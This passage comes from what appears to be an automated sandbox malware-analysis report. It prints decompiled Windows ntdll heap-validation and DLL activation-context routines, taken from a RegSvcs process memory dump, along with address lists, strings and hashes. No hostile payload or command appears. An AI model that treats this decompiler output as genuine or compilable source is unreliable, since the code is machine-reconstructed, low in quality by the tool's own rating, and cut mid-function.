						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E00FBB150();
							} else {
								E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E00FBB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x10a6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E00FF9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E00FE174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E00FBB150();
										} else {
											E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E00FBB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E00FBB150();
									} else {
										E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E00FBB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E00FBB150();
								} else {
									E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E00FBB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E00FBB150();
							} else {
								E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E01074AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E0106FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E010623E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}

0x010744a1
0x010744a3
0x010744a7
0x010744ac
0x010744af
0x010744b2
0x010744b9
0x010744bc
0x010747f2
0x010747f2
0x010747f8
0x010747fc
0x010747fe
0x01074804
0x01074805
0x01074805
0x0107480c
0x01074810
0x01074812
0x01074812
0x01074812
0x01074822
0x01074822
0x01074827
0x01074827
0x00000000
0x01074827
0x010744c4
0x010744d3
0x010744d9
0x010744dc
0x010744de
0x010744e0
0x01074560
0x01074520
0x01074522
0x01074525
0x01074528
0x0107452b
0x0107452e
0x01074530
0x01074697
0x0107469d
0x010746a1
0x010746c0
0x010746c5
0x010746a3
0x010746b8
0x010746bd
0x010746cb
0x010746d4
0x01074677
0x01074677
0x01074679
0x0107467c
0x0107468a
0x01074690
0x01074690
0x010747f1
0x010747f1
0x010747f1
0x00000000
0x010747f1
0x01074536
0x01074539
0x0107453c
0x01074636
0x0107463c
0x01074640
0x0107465f
0x01074664
0x01074642
0x01074657
0x0107465c
0x01074670
0x00000000
0x01074542
0x01074542
0x01074546
0x01074548
0x0107454b
0x01074555
0x0107455b
0x0107455b
0x0107455b
0x0107455d
0x0107455d
0x0107455d
0x00000000
0x0107455d
0x0107453c
0x01074579
0x0107457c
0x01074587
0x01074589
0x01074591
0x01074592
0x01074597
0x01074598
0x010745a1
0x010745ab
0x010745ab
0x010745a1
0x010745ae
0x010745b4
0x010745b9
0x010745bd
0x01074759
0x01074759
0x0107475f
0x01074761
0x01074763
0x01074765
0x01074768
0x0107476b
0x0107476d
0x0107479c
0x0107479c
0x0107479f
0x010747a2
0x010747a4
0x01074830
0x01074833
0x01074879
0x0107487d
0x010748f1
0x010748f3
0x010748f3
0x00000000
0x010748f3
0x0107487f
0x01074885
0x01074887
0x010748a8
0x010748a8
0x010748ae
0x010748b0
0x010748dc
0x010748dc
0x010748dc
0x010748dc
0x010748ec
0x00000000
0x010748ec
0x010748b2
0x010748bc
0x010748be
0x010748c1
0x00000000
0x00000000
0x00000000
0x00000000
0x010748c3
0x010748c3
0x010748c6
0x010748c9
0x010748cc
0x010748d1
0x010748d4
0x00000000
0x00000000
0x010748d6
0x010748d7
0x010748da
0x00000000
0x00000000
0x00000000
0x010748da
0x0107494f
0x01074955
0x01074959
0x01074978
0x0107497d
0x0107495b
0x01074970
0x01074975
0x01074986
0x01074987
0x0107498a
0x0107498d
0x01074997
0x010747ef
0x010747ef
0x010747ef
0x00000000
0x010747ef
0x01074890
0x01074890
0x01074891
0x01074891
0x01074894
0x01074897
0x0107489d
0x010748a0
0x00000000
0x00000000
0x010748a2
0x010748a3
0x010748a6
0x00000000
0x00000000
0x00000000
0x010748a6
0x010748fb
0x01074901
0x01074905
0x01074924
0x01074929
0x01074907
0x0107491c
0x01074921
0x0107492f
0x01074935
0x01074936
0x01074939
0x01074942
0x00000000
0x01074947
0x01074835
0x0107483b
0x0107483f
0x0107485e
0x01074863
0x01074841
0x01074856
0x0107485b
0x01074869
0x0107486c
0x0107486f
0x010747e7
0x010747e7
0x00000000
0x010747ec
0x010747aa
0x010747b0
0x010747b4
0x010747d3
0x010747d8
0x010747b6
0x010747cb
0x010747d0
0x010747de
0x010747df
0x010747e2
0x00000000
0x00000000
0x00000000
0x00000000
0x0107476f
0x0107476f
0x01074778
0x01074785
0x01074787
0x0107478c
0x0107478e
0x00000000
0x00000000
0x01074790
0x01074792
0x01074794
0x00000000
0x00000000
0x01074796
0x01074799
0x00000000
0x01074799
0x00000000
0x010745c3
0x010745c3
0x010745c7
0x010745c7
0x010745ca
0x010745cf
0x010745d3
0x010745df
0x010745e4
0x010745e6
0x010745e8
0x010745ed
0x010745ed
0x010745f2
0x010745f2
0x010745f7
0x010745fc
0x01074602
0x01074606
0x01074609
0x0107460f
0x010746de
0x010746e3
0x010746e5
0x010746ec
0x010746ee
0x010746f6
0x010746f6
0x010746f6
0x010746f6
0x010746ec
0x01074615
0x01074615
0x0107461d
0x0107462e
0x0107462e
0x0107461d
0x0107460f
0x01074609
0x010746fd
0x00000000
0x00000000
0x01074710
0x0107471a
0x01074720
0x01074720
0x01074722
0x0107472c
0x00000000
0x0107472e
0x0107472e
0x00000000
0x0107472e
0x0107472c
0x01074738
0x0107473c
0x0107474b
0x01074751
0x01074751
0x00000000
0x0107473c
0x010748f4
0x010748f4
0x00000000
0x010748f4

Strings

Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 010747E2
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 01074992
HEAP: , xrefs: 0107465F, 010746C0, 010747D3, 0107485E, 01074924, 01074978
HEAP[%wZ]: , xrefs: 01074652, 010746B3, 010747C6, 01074851, 01074917, 0107496B
Non-Dedicated free list element %p is out of order, xrefs: 0107466B
dedicated (%04Ix) free list element %p is marked busy, xrefs: 010746CF
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 0107493D
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 0107486F

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: 847e13d1e85e9e43babacb3c406ce45c197f1aaa204c6ae19d8fe816c032fbae
Instruction ID: 5af7d8cbdf6adcc412248d08d633eebe73ad6230b2d87e55c22410bfd0e506ae
Opcode Fuzzy Hash: 847e13d1e85e9e43babacb3c406ce45c197f1aaa204c6ae19d8fe816c032fbae
Instruction Fuzzy Hash: EBF12131A00649DFDB61CFA9C480BAAFBF5FF09300F0480A9E186DB692D778E945CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8E00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00FE8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x10ad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x10a8464; // 0x74cc0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x10a5780 & 0x00000003) != 0) {
							E01035510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x10a5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00FFB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x10a7984; // 0xb52b50
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x10a8464; // 0x74cc0110
					 *0x10ab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00FE9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x10a5780 & 0x00000005) != 0) {
						_push(_t49);
						E01035510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x00fe8e0f
0x00fe8e16
0x00fe8e19
0x00fe8e1b
0x00fe8e21
0x00fe8e7f
0x00fe8e85
0x01029354
0x0102936c
0x01029371
0x0102937b
0x01029381
0x01029381
0x0102937b
0x00fe8e9d
0x00fe8e9d
0x00fe8e29
0x00fe8e2c
0x00fe8e38
0x00fe8e3e
0x00fe8e43
0x00fe8eb5
0x00fe8eb9
0x010292aa
0x010292af
0x010292e8
0x010292e8
0x010292af
0x00fe8eb9
0x00fe8e45
0x00fe8e53
0x00fe8e5b
0x00fe8e5f
0x00fe8e78
0x00fe8e78
0x00fe8e7d
0x00fe8ec3
0x00fe8ecd
0x00fe8ed2
0x00fe8ed2
0x00fe8ec5
0x00fe8ec5
0x00000000
0x00fe8e7d
0x00fe8e67
0x00fe8ea4
0x0102931a
0x00000000
0x00000000
0x01029320
0x00fe8ea4
0x00fe8e70
0x01029325
0x01029340
0x01029345
0x01029345
0x00fe8e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 00FE8E53

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0102932A
Querying the active activation context failed with status 0x%08lx, xrefs: 01029357
minkernel\ntdll\ldrsnap.c, xrefs: 0102933B, 01029367
LdrpFindDllActivationContext, xrefs: 01029331, 0102935D

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 1b9c9d2cb9f567b0d92c3bbdeb49fa7c2a32cb9dc530247854cf22980b0e497b
Instruction ID: 083acc791945f3a8c6c16614cdd24b7eb1408dfefe84286120a87f7cb6a71aef
Opcode Fuzzy Hash: 1b9c9d2cb9f567b0d92c3bbdeb49fa7c2a32cb9dc530247854cf22980b0e497b
Instruction Fuzzy Hash: 97413C32E007919EDF34BADAC848B7572A4BB103E4F098169D84C97190EF719D81B382

Uniqueness

Uniqueness Score: -1.00%

Function 00FDA309 Relevance: 8.2, Strings: 6, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00FDA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x10a8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E00FDA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E00FDDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E00FB9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E00FBA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x10a8748 - 1;
						if( *0x10a8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E00FBB150();
								} else {
									E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E00FBB150();
								__eflags =  *0x10a7bc8;
								if( *0x10a7bc8 == 0) {
									__eflags = 1;
									E01072073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x10a8748 - 1;
							if( *0x10a8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E00FE174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E00FD7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E010714FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E00FB9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E00FB9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x10a8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E00FBB150();
											} else {
												E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E00FBB150();
											_pop(_t491);
											__eflags =  *0x10a7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01072073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0107A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E00FDA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E00FD7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E00FD7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
